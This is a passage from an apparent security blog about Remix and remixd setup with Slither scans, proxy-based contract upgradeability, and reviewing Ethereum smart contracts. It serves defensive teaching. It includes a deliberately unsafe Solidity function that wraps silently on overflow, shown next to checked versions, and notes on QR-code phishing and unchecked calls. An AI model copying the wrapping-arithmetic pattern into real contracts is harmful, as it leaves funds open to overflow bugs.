/></b></div>Note:</b> Some of the findings can be false positives, so take care. Make sure you <span style="color: red;">untick the external library option if the libraries are trusted.</span><h2 style="text-align: left;">Interacting From Your Machine With Remix </h2><div style="text-align: justify;">The next step is to see how we can interact with Remix locally from our machine. For a complex project, you can't just copy-paste a single .sol file and let it run. To make our life easier, Remix has a <span style="color: #ff00fe;">localhost connection</span> which allows you to work on the project on your local machine from the web IDE. This is something I'm used to doing when the project has a large number of inherited contracts. Obviously, this makes our life easier than ever: just download the git project and run a couple of commands.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">remixd is a tool intended to be used with Remix IDE (aka Browser-Solidity). It opens a websocket connection between Remix IDE (the DApp) and the local computer. You can also use Burp to intercept the remixd traffic (although it is not going to be easy). In practice, Remix IDE makes available a folder shared by remixd. If you would like to install the tool, follow the steps below (remixd needs npm and node).</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><i>yarn global add @remix-project/remixd</i></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> Alternatively, remixd can be used to set up a development environment that can be used with other popular frameworks like Embark, Truffle, Ganache, etc. 
The command above will work in most linux distributions.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Step Six: </b>Go to WorkSpaces and click "Connect to Localhost"</div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuF3W_6lbcIm38NqRkHSdV59tSuGA8kU0zduTVbKuhzm3PLad0XmzRbBt9WADsm5ZHyFHinuyZlHK3e8_RBpqo141VcQK78XkbBfkF9Ufx3R_DKw0ZAqNM_Gy0NK2i5nG6gAMC30_23qPc2gJcbb8_4qQ6S_mBn4eir9qKjH10R0EJhqlPaiEPD5sO/s254/Screenshot%20from%202022-07-23%2018-44-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="122" data-original-width="254" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuF3W_6lbcIm38NqRkHSdV59tSuGA8kU0zduTVbKuhzm3PLad0XmzRbBt9WADsm5ZHyFHinuyZlHK3e8_RBpqo141VcQK78XkbBfkF9Ufx3R_DKw0ZAqNM_Gy0NK2i5nG6gAMC30_23qPc2gJcbb8_4qQ6S_mBn4eir9qKjH10R0EJhqlPaiEPD5sO/s1600/Screenshot%20from%202022-07-23%2018-44-23.png" width="254" /></a></div><div><br /></div><b style="text-align: justify;">Step Seven: </b><span style="text-align: justify;">Check the remixd version and connect.</span><br /><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvhHnG9cOv5vVCBOECcONfoXX47skdAAZfkOnhJeC9VgZQ_PNXDe1w7d0SnmYgtheux1cAt7NipRR4LwuhGqcBJ83Nqo2quzR24O8Z46qJ-IGgCnPp4otQ_JovauPYPoPYNPN6pVN_FAUxJYnVBc9AkMD9mFPcbdt3o6LIp1oSt2DdMJOcMAzbPEvL/s490/Screenshot%20from%202022-07-23%2018-45-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="486" data-original-width="490" height="396" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvhHnG9cOv5vVCBOECcONfoXX47skdAAZfkOnhJeC9VgZQ_PNXDe1w7d0SnmYgtheux1cAt7NipRR4LwuhGqcBJ83Nqo2quzR24O8Z46qJ-IGgCnPp4otQ_JovauPYPoPYNPN6pVN_FAUxJYnVBc9AkMD9mFPcbdt3o6LIp1oSt2DdMJOcMAzbPEvL/w400-h396/Screenshot%20from%202022-07-23%2018-45-43.png" width="400" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> A message box pops up; read it carefully and copy the command shown in the box to connect to your localhost. The -u parameter of remixd is a copy-paste of the URL of the Remix instance you are actively using (as shown in the workspace tab).</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The remixd command for my workspace is:</div><div style="text-align: justify;"><br /></div><div style="text-align: left;"><i>remixd -s localWorkspace/ -u https://remix.ethereum.org</i></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> remixd provides full read and write access to the given folder for any application that can access TCP port 65520 on your local host. To minimize the risk, remixd can ONLY bridge between your filesystem and the Remix IDE URLs, including:</div><div style="text-align: justify;"><div><ul><li> https://remix.ethereum.org</li><li> https://remix-alpha.ethereum.org</li><li> https://remix-beta.ethereum.org</li><li> package://a7df6d3c223593f3550b35e90d7b0b1f.mod</li><li> package://6fd22d6fe5549ad4c4d8fd3ca0b7816b.mod</li><li> https://ipfsgw.komputing.org</li></ul></div></div><div style="text-align: justify;"><b>Note:</b> In the terminal where remixd is running, typing ctrl-c will close the session. Remix IDE will then put up a modal saying that remixd has stopped running. 
If remixd has hung, running killall node from the terminal where you launched it kills it, but note that this also kills every other Node process you have running, so prefer ctrl-c.</div><h2 style="text-align: justify;">Remixd and Slither (automated security scans)</h2><div style="text-align: justify;">The end goal of this lengthy post is to let you run automated scans with tools such as Slither from the Remix IDE against code on your own machine. The remixd NPM package can also install Slither for you: the command below installs Slither, solc-select and the latest version of solc. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">If you run the following command on your Linux box, it will work 90% of the time:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><i>remixd -i slither</i></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note:</b> The command above takes care of the dependencies. If it fails, check first that Python 3 and pip are installed, since Slither is a Python package.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">If a project is shared through remixd and the localhost workspace is loaded in the Remix IDE, an extra checkbox appears in the Solidity Static Analysis plugin with this label:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig6U-wk5fyj3CAaj-c019ngtz19_yqCGS8j-Y8UMa5dmxmk4w06j7EX5AUdsi3ex-DX8B5QPCHkYY1-e1FkuvUmMZZrOao45-Rk90zCOXBQRuV13n9aIA6wf_xae8lRP0pQurrT69yNb5YKmU5Fz1hdKr12-abgH6WrFNcsjU01ciaYPSUqAXjSQ2d/s358/Screenshot%20from%202022-07-23%2019-45-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="358" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig6U-wk5fyj3CAaj-c019ngtz19_yqCGS8j-Y8UMa5dmxmk4w06j7EX5AUdsi3ex-DX8B5QPCHkYY1-e1FkuvUmMZZrOao45-Rk90zCOXBQRuV13n9aIA6wf_xae8lRP0pQurrT69yNb5YKmU5Fz1hdKr12-abgH6WrFNcsjU01ciaYPSUqAXjSQ2d/s320/Screenshot%20from%202022-07-23%2019-45-21.png" 
width="320" /></a></div><br /><div style="text-align: justify;"><b>Note:</b> When you connect to localhost, Remix opens a workspace that mirrors the shared folder, so if the folder is empty the workspace is empty too. Add your .sol files there (from either side) and they appear in both places. Also </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://external-content.duckduckgo.com/iu/?u=http%3A%2F%2Fclipground.com%2Fimages%2Fin-the-end-clipart-8.jpg&f=1&nofb=1" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="800" height="640" src="https://external-content.duckduckgo.com/iu/?u=http%3A%2F%2Fclipground.com%2Fimages%2Fin-the-end-clipart-8.jpg&f=1&nofb=1" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div><b>References:</b></div><div><br /></div><div>- <a href="https://remix.ethereum.org/" target="_blank">REMIX</a> </div><div>- <a href="https://github.com/ethereumbook/ethereumbook" target="_blank">Mastering Ethereum</a></div><div>- <a href="https://remix-ide.readthedocs.io/en/latest/#" target="_blank">Remix Docs</a></div><div>- <a href="https://github.com/ConsenSys/mythril" target="_blank">Mythril</a></div><div>- <a href="https://remix-ide.readthedocs.io/en/latest/import.html" target="_blank">Importing Libraries</a></div><div>- <a href="https://remix-ide.readthedocs.io/en/latest/static_analysis.html" target="_blank">Remix Static Analysis</a></div><div>- <a href="https://mythx.io/" target="_blank">Ethereum Security Scanner</a></div><div>- <a href="https://arvanaghi.com/blog/pentesting-ethereum-dapps/" target="_blank">Difference of DApps and Web Apps</a></div><div>- <a href="https://www.tutorialspoint.com/solidity/solidity_function_modifiers.htm" target="_blank">Modifiers Solidity</a></div><div>- <a 
href="https://medium.com/coinmonks/solidity-tutorial-all-about-modifiers-a86cf81c14cb" target="_blank">Modifiers Solidity</a> </div><div>- <a href="https://github.com/enderphan94/solidity-pentest/blob/master/PentestGuidline.md" target="_blank">Pentest Guides</a></div><div>- <a href="https://www.npmjs.com/package/@remix-project/remixd" target="_blank">Remix Tool</a></div><div>- <a href="https://github.com/enderphan94/solidity-pentest/blob/master/PentestGuidline.md" target="_blank">Slither Tool</a></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-31872537459769788432021-05-03T06:15:00.001-07:002021-05-03T06:15:45.768-07:00Solidity Smart Contract Upgradeability<h2 style="text-align: left;">Introduction </h2><div style="text-align: justify;">This article focuses on smart contract upgradeability: why it matters and how it can be achieved. When dealing with smart contracts we need to be able to upgrade our system code, because when security-critical bugs appear we must be able to remediate them. We will also want to enhance the code and add more features. 
Smart contract upgradeability is not as simple as upgrading ordinary software, because the bytecode deployed at an address is immutable.</div><div style="text-align: justify;"> </div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjm_QVzitq_WsSsju5eIlOmPaWm5l_RI9vHvtWZYrnj0uUpN8x8yQlo3uFLZJTS4syRNKLRalsU3SQUc_IOcnCBKH7F4a7_FEeJukqyeAKXsKxukahke0a_26w9yaAsz_3ko4rehM7g98/s481/external-content.duckduckgo.com.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="474" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjm_QVzitq_WsSsju5eIlOmPaWm5l_RI9vHvtWZYrnj0uUpN8x8yQlo3uFLZJTS4syRNKLRalsU3SQUc_IOcnCBKH7F4a7_FEeJukqyeAKXsKxukahke0a_26w9yaAsz_3ko4rehM7g98/w394-h400/external-content.duckduckgo.com.jpg" width="394" /></a></div><div>As already mentioned, smart contracts are immutable by design. On the other hand, software quality heavily depends on the ability to upgrade and patch source code in order to produce iterative releases. Even though blockchain-based software profits significantly from the technology’s immutability, a certain degree of mutability is still needed for bug fixing and product improvements.</div><div> </div><h2>Preparing for Upgrades </h2></div><div style="text-align: left;"><div style="text-align: left;">In order to upgrade properly we should focus on the following aspects of the project:</div><div style="text-align: left;"><ul style="text-align: left;"><li>Have money management strategies in place</li><li>Create a pause functionality </li><li>Have paths to upgrades<ul><li>Switching addresses</li><li>Switching Oracles</li><li>Proxy contracts </li></ul></li></ul><p style="text-align: justify;">This functionality is mandatory in order to maintain the system and manage its risk. The money management strategy is about where and how we hold the funds and the system data; the pause functionality lets us stop the contract while a fix is prepared; switching addresses is what the proxy contract does for us, and the remaining items are the flow paths we designed for upgrading the smart contracts [1]. </p><p style="text-align: justify;"><br /></p><h2>Proxy Contract</h2><p style="text-align: justify;">The basic idea is to use a proxy for upgrades. The first contract is a
simple wrapper or "proxy" which users interact with directly and is in
charge of forwarding transactions to and from the second contract, which
contains the logic. The key concept to understand is that the logic
contract can be replaced while the proxy, or the access point is never
changed. Both contracts are still immutable in the sense that their code
cannot be changed, but the logic contract can simply be swapped by
another contract. The wrapper can thus point to a different logic
implementation and in doing so, the software is "upgraded"</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8XmQvHGph0ZjizsePQQl21oS3fXqj_NoTKUM5niDcvhDGJtKP8GKHk16ee0VBYshWpo1iaivTQl0-5JNgbrJXkW-9MPzRlRZOIvj5ycKjysXxM4tlxjxqDaPxuIh1T0D8h2ZQfFSFyW4/s851/Untitled+Diagram.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="397" data-original-width="851" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8XmQvHGph0ZjizsePQQl21oS3fXqj_NoTKUM5niDcvhDGJtKP8GKHk16ee0VBYshWpo1iaivTQl0-5JNgbrJXkW-9MPzRlRZOIvj5ycKjysXxM4tlxjxqDaPxuIh1T0D8h2ZQfFSFyW4/w640-h298/Untitled+Diagram.jpg" width="640" /></a></div><br /><p style="text-align: justify;"><b>Note:</b> This abstract proxy contract provides a fallback function that delegates all calls to another contract using the EVM
instruction <code>delegatecall</code>. We refer to the second contract as the <em>implementation</em> behind the proxy, and it has to
be specified by overriding the virtual <a href="https://docs.openzeppelin.com/contracts/3.x/api/proxy#Proxy-_implementation--"><code>_implementation</code></a> function. Additionally, delegation to the implementation can be triggered manually through the <a href="https://docs.openzeppelin.com/contracts/3.x/api/proxy#Proxy-_fallback--"><code>_fallback</code></a> function, or to a
different contract through the <a href="https://docs.openzeppelin.com/contracts/3.x/api/proxy#Proxy-_delegate-address-"><code>_delegate</code></a> function. </p><p style="text-align: justify;">The most immediate problem that proxies need to solve is how the proxy
exposes the entire interface of the logic contract without requiring a
one to one mapping of the entire logic contract’s interface. That would
be difficult to maintain, prone to errors, and would make the interface
itself not upgradeable. Hence, a dynamic forwarding mechanism is required [1].</p><h2>Proxy Setup</h2><div style="text-align: justify;">The diagram below shows the proxy pointing at exactly one logic contract at a time, with the storage living in the proxy: the logic runs via delegatecall against the proxy's storage, so every logic version must keep the same storage layout (the same variables in the same order, new ones only appended) or it will read and write the wrong slots. This is also the sense in which the setup works around the immutability of the blockchain: the code of each contract is still immutable, but which code the proxy executes is not. <br /></div><div style="text-align: left;"> <br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrc_tbpQnNsQKaOYitPp-0BA9h1V7HDGtDJwLCL8AXFWM53InJtwF6F7EhS9p0urrqn_SSYwCSmbYjXoVQe8TxCQECi3bjyUBvmW360Mnd4DRJ51TpEmsmMTATUbusBOsXiDbJBJMq7dc/s721/Untitled+Diagram%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="337" data-original-width="721" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrc_tbpQnNsQKaOYitPp-0BA9h1V7HDGtDJwLCL8AXFWM53InJtwF6F7EhS9p0urrqn_SSYwCSmbYjXoVQe8TxCQECi3bjyUBvmW360Mnd4DRJ51TpEmsmMTATUbusBOsXiDbJBJMq7dc/w640-h300/Untitled+Diagram%25281%2529.jpg" width="640" /></a></div><p><b>References:</b></p><ul style="text-align: left;"><li><b><a href="https://docs.openzeppelin.com/contracts/3.x/api/proxy" target="_blank">docs.openzeppelin.com</a> </b>[1]<br /></li></ul><p><br /></p><p><br /></p></div></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-18398056317176649012021-03-16T11:35:00.001-07:002021-03-16T11:35:09.274-07:00Ethereum Smart Contract Source Code Review <h2 style="text-align: justify;"> Introduction </h2><div style="text-align: justify;">Cryptocurrency technologies are becoming more prevalent as time passes and banks are starting to adopt them, yet the Ethereum blockchain and the complex programs built on it are still relatively new and highly experimental. 
Therefore, we should expect constant changes in the security landscape, as new bugs and security risks are discovered and new best practices are developed [1]. This article discusses how to perform a source code review of Ethereum Smart Contracts (SCs) and what to look for. More specifically, we are going to focus on specific keywords and how to analyse them. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The points analysed are:</div><div><ul style="text-align: left;"><li style="text-align: justify;">User-supplied input filtering when interacting directly with an SC</li><li style="text-align: justify;">Interfacing with external SCs</li><li style="text-align: justify;">Interfacing with DApps</li><li style="text-align: justify;">SC formal verification</li><li style="text-align: justify;">Wallet authentication in a DApp</li></ul><div style="text-align: justify;"><br /></div></div><div><h2 style="text-align: justify;">SC Programming Mindset</h2><div style="text-align: justify;">When designing an SC ecosystem (a group of interacting SCs), it is wise to have some specific concepts and security design principles in mind. SC programming requires a different engineering mindset than we may be used to. The cost of failure can be high, and change can be difficult, making it in some ways more similar to hardware programming or financial services programming than to web or mobile development. 
</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">When programming SCs we should:</div><div style="text-align: justify;"><ul><li>Design roll-outs carefully</li><li>Keep contracts simple and modular</li><li>Be fully aware of blockchain properties</li><li>Prepare for failure</li></ul></div><div style="text-align: justify;"><h2>Key Security Concepts For SC Systems</h2><div><br /></div></div><div style="text-align: justify;">More specifically, it is mandatory, and the responsible thing to do, to take the following areas into consideration:</div><div style="text-align: justify;"><ul><li>SC ecosystem monitoring, e.g. watching for unusual transactions</li><li>SC ecosystem governance/administration, e.g. through proxy SCs that follow best practices</li><li>Formal verification of all the SCs the system interacts with</li><li>Modular, clean SC code, e.g. comments and a modular design</li><li>SC ecosystem code audit by an independent third party</li><li>SC ecosystem penetration test by an independent third party</li></ul></div><div style="text-align: justify;"><b>Note:</b> The interaction between the DApp and its smart contracts should be reviewed as well.</div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">SCs User Input Validation</h2><div style="text-align: justify;">Make sure you apply user input validation at both the DApp and the SC level. 
Remember that on-chain data is public and that an adversary does not need your DApp at all: they can interact with an SC directly, for instance through an Ethereum explorer such as etherscan.io, as the following screenshots demonstrate.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see an example of a deployed contract:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8HSdyHxI-eQfP8JKKVs7-YRrpMNKRn4z7Dp1zC8jhKMAh6FDR8Ea1QhZERn2s2N_Rns_2TgOP6Dcf5zN4ndQ3XQ5XZfcjZYue2jr8uIhZEsaC59IpOvM85BFTMbc8APbaRtYH80a4gVQ/s1388/2021-03-16_18-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="687" data-original-width="1388" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8HSdyHxI-eQfP8JKKVs7-YRrpMNKRn4z7Dp1zC8jhKMAh6FDR8Ea1QhZERn2s2N_Rns_2TgOP6Dcf5zN4ndQ3XQ5XZfcjZYue2jr8uIhZEsaC59IpOvM85BFTMbc8APbaRtYH80a4gVQ/w640-h316/2021-03-16_18-24.png" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Simply by clicking the SC link we can interact with the contract:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvUUq-kof0qVNkJfHdTMLplmuDJGBFfOAwAggYk7rIhbJ8lW4qNrxzB1nHz1eCCi1aqkyeCRlVLY0Qrrz7OMAcq5o3QiUyoLF48FPXH7EEcT9x_76Qg7tnrwXZwY9EfICBxVmD_5p0MI/s1422/2021-03-16_18-27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="463" data-original-width="1422" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOvUUq-kof0qVNkJfHdTMLplmuDJGBFfOAwAggYk7rIhbJ8lW4qNrxzB1nHz1eCCi1aqkyeCRlVLY0Qrrz7OMAcq5o3QiUyoLF48FPXH7EEcT9x_76Qg7tnrwXZwY9EfICBxVmD_5p0MI/w640-h208/2021-03-16_18-27.png" width="640" 
/></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>Note: </b> Above we can see the upgrade function call and various other admin functions. Of course, calling them successfully is not that easy, because they are normally restricted to privileged accounts; the point is that they are visible and reachable by anyone, so the access control on each one is exactly what the review has to verify.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">etherscan.io also provides an experimental feature to decompile the SC bytecode, which matters when no verified source is published:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHvYJ5oCRNufoE2QrJddpzmgVCPXCs3soyoX1LxhrEOeE3scALpfS_06xb63K5BYBV2prRXtGgOAQy-IceK17lG8NVQkQsBLPImYCQNjdns28YaILxD3qe3LFxvohEm5M6SfhlyVonMY4/s1388/2021-03-16_18-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="1388" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHvYJ5oCRNufoE2QrJddpzmgVCPXCs3soyoX1LxhrEOeE3scALpfS_06xb63K5BYBV2prRXtGgOAQy-IceK17lG8NVQkQsBLPImYCQNjdns28YaILxD3qe3LFxvohEm5M6SfhlyVonMY4/w640-h158/2021-03-16_18-32.png" width="640" /></a></div><br /> If we click the decompile option we get the screen below:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1dbb2IK516JJ2qqj20CmB5Ue902yg8gIXmQ__A11QM7cWQqWUbHXJu8b6gs_qEZTuqSmqeN2nqznqNLjMgSFFF4lGZuKuREszWQ6PCt2JkJunzoFD6WHSOoRiML1nIH1svW1339Sen20/s1461/2021-03-16_18-35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="558" data-original-width="1461" height="244" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1dbb2IK516JJ2qqj20CmB5Ue902yg8gIXmQ__A11QM7cWQqWUbHXJu8b6gs_qEZTuqSmqeN2nqznqNLjMgSFFF4lGZuKuREszWQ6PCt2JkJunzoFD6WHSOoRiML1nIH1svW1339Sen20/w640-h244/2021-03-16_18-35.png" width="640" /></a></div><div><br /></div>Below we can see how a DApp or wallet interacts with an SC:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifHkxEqRzx0djh_PxOVKWZZri8GJa8RbXou16dAxc6Za0PUi5x5M0kJys8DQIhithCMk-937KfjaNyZrDI0OB8cCdnRfR3lAGIu2GaCccNUTJAvkodb0c4hKAZMgz2ZCY5b52Nevy-8Y0/s871/Untitled+Diagram+%25282%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="752" data-original-width="871" height="552" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifHkxEqRzx0djh_PxOVKWZZri8GJa8RbXou16dAxc6Za0PUi5x5M0kJys8DQIhithCMk-937KfjaNyZrDI0OB8cCdnRfR3lAGIu2GaCccNUTJAvkodb0c4hKAZMgz2ZCY5b52Nevy-8Y0/w640-h552/Untitled+Diagram+%25282%2529.jpg" width="640" /></a></div><br /><div><br /><div style="text-align: justify;"><div>There are five categories of Ethereum wallets that can interact with DApps:</div><div><ul><li>Browser built-in (e.g. Opera, Brave)</li><li>Browser extension (e.g. MetaMask)</li><li>Mobile wallets (e.g. Trust, Walleth, Pillar)</li><li>Account-based web wallets (e.g. Fortmatic, 3box)</li><li>Hardware wallets (e.g. Ledger, Trezor)</li></ul></div></div><div style="text-align: justify;">Then there is a larger category of wallets that cannot integrate with DApps: generic wallet apps that lack the functionality to interact with smart contracts. Different wallets have a different user experience for connecting. With MetaMask you get a Connect pop-up; with mobile wallets you scan a QR code. Phishing attacks therefore take a different form for each; for example, an attacker can substitute a spoofed QR code, produced with any free online QR generator, for the genuine one. 
When assessing a DApp, the architecture is of paramount importance. A user with the MetaMask extension can use it to connect to the DApp, and the DApp will associate the session with the user's account address (derived from their public key) to run its various tasks. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">For a web-based DApp we can use traditional input filtering. For SCs written in Solidity, assert and require are the convenience functions that check conditions (a user supplies input and these functions check whether the expected conditions hold). When a condition is not met they throw an exception that reverts the transaction, which is how we handle the error.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Solidity raises an assert-type exception (reported as a Panic in 0.8 and later) when [3]:<br /><ul><li>assert is called with an argument that evaluates to false.</li><li>A zero-initialised variable of internal function type is called.</li><li>A value that is too large or negative is converted to an enum.</li><li>A division or modulo by zero occurs.</li><li>An array is accessed at an index that is too large or negative.</li></ul>The require function guarantees the validity of conditions that cannot be detected before execution. 
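As an added example (not code from the original post), here is a small ledger contract that applies require to everything the caller controls and assert to an internal invariant, and shows the silently wrapping arithmetic that SafeMath was written to stop next to the checked arithmetic Solidity 0.8 performs by default. The contract and function names are illustrative.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not from the original post. Names are illustrative.
contract Ledger {
    mapping(address => uint256) public balances;
    uint256 public totalSupply;

    // require(): validates what the caller controls. A failing require
    // reverts with the reason string and refunds the unused gas.
    function deposit() external payable {
        require(msg.value > 0, "deposit: zero value");
        balances[msg.sender] += msg.value;   // 0.8+: reverts on overflow
        totalSupply += msg.value;
        // assert(): an internal invariant that no input should ever break.
        // If it fails, the contract itself has a bug (0.8+ reports Panic(0x01)).
        assert(balances[msg.sender] <= totalSupply);
    }

    function transfer(address to, uint256 amount) external {
        require(to != address(0), "transfer: zero address");
        require(to != msg.sender, "transfer: self transfer");
        require(amount > 0, "transfer: zero amount");
        require(balances[msg.sender] >= amount, "transfer: insufficient balance");
        balances[msg.sender] -= amount;
        balances[to] += amount;
        // The two balances are distinct accounts, so their sum can never
        // exceed what has been deposited in total.
        assert(balances[msg.sender] + balances[to] <= totalSupply);
    }

    // Pre-0.8 behaviour, reproduced with an unchecked block: the sum wraps
    // silently past the maximum. This is the bug class SafeMath exists to catch.
    function wrappingAdd(uint256 a, uint256 b) external pure returns (uint256) {
        unchecked {
            return a + b;
        }
    }

    // Default 0.8+ behaviour, equivalent to SafeMath.add on older compilers:
    // the transaction reverts (Panic(0x11)) instead of wrapping.
    function checkedAdd(uint256 a, uint256 b) external pure returns (uint256) {
        return a + b;
    }

    // The explicit check SafeMath performs, for readers on an older compiler:
    // if the wrapped result is smaller than an operand, an overflow happened.
    function safeAdd(uint256 a, uint256 b) external pure returns (uint256 c) {
        unchecked {
            c = a + b;
        }
        require(c >= a, "safeAdd: overflow");
    }
}
```

Calling wrappingAdd with a value of type(uint256).max and 1 returns a wrapped result, while checkedAdd and safeAdd revert on the same input; the review question for any arithmetic on user-supplied numbers is which of the three behaviours the compiler version and the surrounding code actually give you.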
Concretely, require() checks inputs, contract state variables and return values from calls to external contracts.<br /><br /></div><div style="text-align: justify;">Solidity triggers a require-type exception when [3]:<br /><ul><li>require is called with an argument that evaluates to false.</li><li>A function called through a message call does not finish properly (it runs out of gas, has no matching function, or throws itself).</li><li>A contract created with the new keyword does not finish its constructor properly.</li><li>An external function is called on an address that holds no code.</li><li>The contract receives Ether through a public getter function.</li><li>A .transfer() fails.</li></ul></div><div style="text-align: justify;">Generally speaking, when handling complex user input and running arithmetic on it, it is mandatory to rely on audited third-party libraries. A project to look into is SafeMath from <a href="https://docs.openzeppelin.com/contracts/2.x/api/math">OpenZeppelin</a>, a wrapper over Solidity’s arithmetic operations with added overflow checks. Before Solidity 0.8.0, arithmetic operations wrap on overflow. This easily results in bugs, because programmers usually assume that an overflow raises an error. SafeMath restores this intuition by reverting the transaction when an operation overflows. Since 0.8.0 the compiler inserts the same checks itself, so SafeMath is only needed on older compilers or for code placed in an unchecked block.</div><div style="text-align: justify;"><br /></div><h2 style="text-align: left;">SC External Calls</h2></div><div><br /></div><div style="text-align: justify;">Calls to untrusted third-party smart contracts can introduce several security issues. External calls may execute malicious code in that contract or in any other contract it depends upon. As such, every external call should be treated as a potential security risk. Solidity's low-level call is the generic interface for sending a message to an address. Its first return value is false if the callee reverted or the call otherwise failed, and true otherwise; it never throws by itself. 
The compiler has no notion of a safe or legitimate call: if it compiles, it is valid Solidity, so judging each external call is the reviewer's job.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwPgWz9jxfWREW5XCowB8p_RvK3I02egaCOK84uUtTH1CtA96CKGNok1xREVrh8umv9AEEMKFxXLW0AsOkJ0zI_NA_YlqGFzI2MOTbHw93LEF8tDJeXmq3IGJDFMPrI3efViu1vCvZmjo/s771/Untitled+Diagram+%25283%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="302" data-original-width="771" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwPgWz9jxfWREW5XCowB8p_RvK3I02egaCOK84uUtTH1CtA96CKGNok1xREVrh8umv9AEEMKFxXLW0AsOkJ0zI_NA_YlqGFzI2MOTbHw93LEF8tDJeXmq3IGJDFMPrI3efViu1vCvZmjo/w640-h250/Untitled+Diagram+%25283%2529.jpg" width="640" /></a></div><br /><div style="text-align: justify;">In particular, when the return value of a low-level call (call, delegatecall, send) is not checked, execution resumes even if the called contract threw an exception. If the call fails accidentally, or an attacker forces it to fail, this may cause unexpected behavior in the subsequent program logic. Always handle the possibility that the call will fail by checking its return value 